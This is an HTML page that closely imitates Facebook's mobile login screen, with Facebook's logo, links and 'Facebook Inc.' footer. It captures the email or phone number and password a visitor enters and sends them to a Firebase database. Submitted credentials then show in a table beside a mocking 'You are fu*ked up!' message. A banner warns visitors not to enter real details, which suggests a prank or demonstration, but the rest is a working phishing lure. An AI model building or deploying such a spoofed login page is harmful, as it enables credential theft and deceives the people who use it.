<html><head> 
  <link href="https://fonts.googleapis.com/css2?family=Roboto&amp;display=swap" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> 
  <link rel="stylesheet" href="index.css"> 
  <link rel="shortcut icon" type="image/x-icon" href="https://imgur.com/q5BzHY0.png" />
 </head> 
 <body id="body"> 
  <!--Thus is the list of the users that will be visible if user submit his data --> 
  <table id="userList"> 
   <tbody> 
    <tr> 
     <th>Index</th> 
     <th>User(mail/phone)</th> 
     <th>Password</th> 
     <th>Time</th> 
     <th>Date</th> 
    </tr> 
   </tbody> 
  </table> 
  <div id="all"> 
   <!--This is the message that will be visible right after user's submition--> 
   <div id="sucsm">
     You are fu*ked up! 😂 
    <br>Information successfully sent to database 📤 
    <br>It will appear in 2 second 📄 
   </div> 
   <!--This is the main page --> 
   <div id="fscreen"> 
    <script src="https://code.jquery.com/jquery-3.1.1.js"></script> 
    <!--This is the warning message--> 
    <div id="banner"> 
     <i class="material-icons" id="alert">warning</i> 
     <p id="wtxt">Do not enter your actual email/mobile number or password!<b> Your password must be 6 letter long</b>.</p> 
    </div> 
    <!--This is the main template of the login page--> 
    <div id="twarp"> 
     <img id="title" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"> 
    </div> 
    <br> 
    <br> 
    <form id="form" target="_self" "="" action="" autocomplete="on"> 
     <div id="nam" class="input-container"> 
      <input id="nameField" placeholder="Mobile number or email address" type="text" autofocus=""> 
     </div> 
     <br> 
     <br> 
     <div id="pas" class="input-container"> 
      <input type="password" id="passField" placeholder="Password" autofocus=""> 
      <div onclick="snhf()" id="snh"> 
       <p>SHOW</p> 
      </div> 
     </div> 
     <br> 
     <br> 
     <div class="warp"> 
      <button id="send" onclick="addData();return false;" class="common_btn">Log In</button> 
     </div> 
    </form> 
    <div id="lwarp"> 
     <div id="fp"> 
      <div class="line" id="l1"></div> 
      <p id="or">or</p> 
      <div class="line" id="l2"></div> 
     </div> 
     <br> 
    </div> 
    <div class="warp"> 
     <button id="cnew" onclick="window.location.href='https://www.facebook.com/reg/?ref=dbl&amp;refid=8&amp;hrc=1';">Create New Account</button> 
    </div> 
    <div class="warp"> 
     <button onclick="window.location.href='https://m.facebook.com/login/identify/?ctx=recover&amp;c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%3Dhttps%253A%252F%252Fm.facebook.com%252Fhome.php%253Fhrc%253D1%2526refsrc%253Dhttp%25253A%25252F%25252Fm.facebook.com%25252F%2526soft%253Dbookmarks%26ref%3Ddbl%26fl%26refid%3D9%26hrc%3D1&amp;multiple_results=0&amp;ars=facebook_login&amp;lwv=100&amp;ref=dbl&amp;_rdr'" id="fpass"> Forgotten password? </button> 
    </div> 
    <div class="warp"> 
     <table id="lang"> 
      <tbody> 
       <tr> 
        <td> 
         <div id="select">
           English (UK) 
         </div></td> 
        <td>বাংলা</td> 
       </tr> 
       <tr> 
        <td>অসমীয়া</td> 
        <td>हिन्दी</td> 
       </tr> 
       <tr> 
        <td>Bahasa Indonesia</td> 
        <td>Español</td> 
       </tr> 
       <tr> 
        <td>Português (Brasil)</td> 
        <td> 
         <div id="bx">
           + 
         </div></td> 
       </tr> 
      </tbody> 
     </table> 
    </div> 
    <div class="warp"> 
     <p id="ctxt">Facebook Inc.</p> 
    </div> 
   </div> 
  </div> 
  <!--These are the script needed for connecting to firebase--> 
  <script src="https://www.gstatic.com/firebasejs/8.2.9/firebase-app.js"></script> 
  <script src="https://www.gstatic.com/firebasejs/8.2.9/firebase-firestore.js"></script> 
  <script src='/ind.js'> </script>
</body></html>
